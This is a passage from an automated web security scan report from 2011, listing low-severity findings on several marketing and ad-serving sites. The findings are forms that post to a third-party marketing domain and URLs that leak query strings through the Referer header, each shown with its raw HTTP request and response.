Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...
</div>

   <form id="asu1" class="asu wide" action="http://moonraymarketing.com/form_processor.php" method="post" onsubmit="return checkForm732(this);">
<input type="hidden" name="uid" value="p2c1539f38" />
...[SNIP]...

20.5. http://www.quantumjumping.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET /blog/ HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmx_k_180318845=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:53 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 113180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div class="textwidget"><form onsubmit="return checkForm271(this);" method="post" action="http://moonraymarketing.com/form_processor.php" class="app generic arrow-container" id="teleseminar-sidebar-signup">
<input type="hidden" value="p2c1539f37" name="uid">
...[SNIP]...

20.6. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:58 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:59 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:53:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div class="textwidget"><form onsubmit="return checkForm271(this);" method="post" action="http://moonraymarketing.com/form_processor.php" class="app generic arrow-container" id="teleseminar-sidebar-signup">
<input type="hidden" value="p2c1539f37" name="uid">
...[SNIP]...

20.7. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:23 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:24 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div class="textwidget"><form onsubmit="return checkForm271(this);" method="post" action="http://moonraymarketing.com/form_processor.php" class="app generic arrow-container" id="teleseminar-sidebar-signup">
<input type="hidden" value="p2c1539f37" name="uid">
...[SNIP]...

20.8. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:28 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:29 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div class="textwidget"><form onsubmit="return checkForm271(this);" method="post" action="http://moonraymarketing.com/form_processor.php" class="app generic arrow-container" id="teleseminar-sidebar-signup">
<input type="hidden" value="p2c1539f37" name="uid">
...[SNIP]...

20.9. http://www.theamericanmonk.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6; __utmz=63675568.1304488484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63675568.836338964.1304488484.1304488484.1304488484.1; __utmc=63675568; __utmb=63675568.1.10.1304488484; sess_=ysv9sd684163c3y; lastvisit=1304488486; km_lv=1304488488; ref_=mr_7; vid=206617815

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 23523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<div class="section">
           <form id="get-free-audios" class="app signup" action="http://moonraymarketing.com/form_processor.php" method="post" onsubmit="return checkForm777(this);">
<input type="hidden" name="uid" value="p2c1539f21" />
...[SNIP]...

20.10. http://www.theamericanmonk.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6; __utmz=63675568.1304488484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63675568.836338964.1304488484.1304488484.1304488484.1; __utmc=63675568; __utmb=63675568.1.10.1304488484; sess_=ysv9sd684163c3y; lastvisit=1304488486; km_lv=1304488488; ref_=mr_7; vid=206617815

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 23523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<div class="signup my-free-lessons">

   <form id="signupbottom" class="app" action="http://moonraymarketing.com/form_processor.php" method="post" onsubmit="return checkForm467(this);">
<input type="hidden" name="uid" value="p2c1539f21" />
...[SNIP]...

21. Cross-domain Referer leakage  previous  next
There are 16 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


21.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.SD148013N3671SN0/B5403038.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3671.SD148013N3671SN0/B5403038.2;sz=728x90;pc=cbs509675;click0=http://adlog.com.com/adlog/e/r=19884&sg=509675&o=17939%253a&h=cn&p=2&b=5&l=en_US&site=109&pt=8300&nd=17939&pid=&cid=2&pp=100&e=3&rqid=01phx1-ad-e16:4DC066DE4A09DD&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=LcGErAoOYI4AAGp4RtMAAAIs&t=2011.05.04.01.28.49&event=58/;ord=2011.05.04.01.28.49? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 04 May 2011 01:28:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 8001

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri Apr 15 13:11:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
t%3D%26ra%3D173.193.214.243%26pg%3DLcGErAoOYI4AAGp4RtMAAAIs%26t%3D2011.05.04.01.28.49%26event%3D58/http://deals.t-mobile.com/plans%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLjI9.99CjCI999JW1jmfzEpzypl"><img src="http://s0.2mdn.net/998766/1035_728x90_Spring_Largest4GNetwork_7999_Static.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

21.2. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYASABKAEw5pj87QQQ5pj87QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7*@D>7)*0s]#%2L_'x%SEV/i#-5O4FSlRQHqgVr*.vWOENK)ehqWnCsma+$+8hH(K#:4%p3G.v:Z.zDUs_uD`k?idandj8<b_]+Y9)>JxbT-:TrPyR16f>Ne2L7Lz8m^OiiIAJm'jVZEtjuJe$ztL5<-LfW$dXNID7L9mpq(4KKA%VbltLY4eg0$+7#i$q][=3NPKm9PdYU3jeeGKw$iuu$l7(CzVfnEs:6ds3O/53VXJO>l`mQfRy7#>R9s8Gp7?hk^0.X(K:DxR!xu4bKbqa9mrd.?BNS%+<^MUg`c=6U(h<CU!c+81]xA>Sq9y>MmdLRoi#9l24%8e!G9^p8qI)5d<wou'EE<Q4XP=qFe+1Pw8a5e'3-gc4]Adf3p7=/[iQh-:^]yg$pQmdw2xvaX7'fJOCs>R:a43MLOOsrwE*7eD2io=(L6aU8?@-i+J([k/@1oAQ-cih!w=Tvx:(KWA/7i6ARW]l[9>^gfZdqwm4^*Q]M_@X>`PVGCmzFdLtLD05UF'2hjamcs)la=wvWbosXT/%h`Z4EXqQBXL=5LlruN$pcGk].jcuIeJh^o#@0h2+[<_K%TW)KFDNs8G?>Y%.8^aIc/)Z<Q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:28:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 02-Aug-2011 01:28:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 04 May 2011 01:28:57 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

21.3. http://mads.cnet.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mac-ad?CELT=ifc&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:56 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:28:56 GMT
Content-Length: 2049

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<!-- no overgif in ad style --><a href="http://adlog.com.com/adlog/c/r=13060&amp;sg=513174&amp;o=&amp;h=cn&amp;p=2&amp;b=5&amp;l=en_US&amp;site=3&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e15:4DC09E70DC9AF&amp;orh=admeld.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&amp;ra=173%2e193%2e214%2e243&amp;pg=&amp;t=2011.05.04.01.28.56/http://www.cbssports.com/cbssports/schedules/page/golf?ttag=brdgf11_on_all_cbsi_na_iab_0005" target="_blank"><img src="http://adlog.com.com/adlog/i/r=13060&amp;sg=513174&amp;o=&amp;h=cn&amp;p=2&amp;b=5&amp;l=en_US&amp;site=3&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e15:4DC09E70DC9AF&amp;orh=admeld.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&amp;ra=173%2e193%2e214%2e243&amp;dvar=&amp;ucat_rsi=%2526ASK05540%255f10572%2526ASK05540%255f10573%2526ASK05540%255f10578%2526ASK05540%255f10276%2526ASK05540%255f10066%2526ASK05540%255f10174%2526ASK05540%255f10195%2526ASK05540%255f10225%2526ASK05540%255f10269%2526ASK05540%255f10287%2526ASK05540%255f10290%2526ASK05540%255f10354%2526ASK05540%255f10394%2526ASK05540%255f10395%2526ASK05540%255f10537%2526ASK05540%255f10562&amp;pg=&amp;t=2011.05.04.01.28.56/http://i.i.com.com/cnwk.1d/Ads/10874/10/WELLSFARGO300x250.jpg" height="250" width="300" alt="Click Here" border="0" /></a>
...[SNIP]...

21.4. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG4d4BVgEliy4Vfb1kUmDTmvAHSBkwWPSA+lwzHlc8sAowS68GyjBqvQbQBowWYzyXC8QooyyTxbNEPoCyDBoMBgwUDUHTFfFagnsl9p1FEd95nBorOmr8WIQoACHMrEg=="; io_freq_p1="eJzjEudY7yrAJLHlwq+3LAoMGgwGTBY9IDaXNMfxQAFmifVgCUaN1yDagNECzOcS5tgWKsAoMbnvNFQXgwUDUHCvC1Bw1vy1CEEAW5EfCA=="; 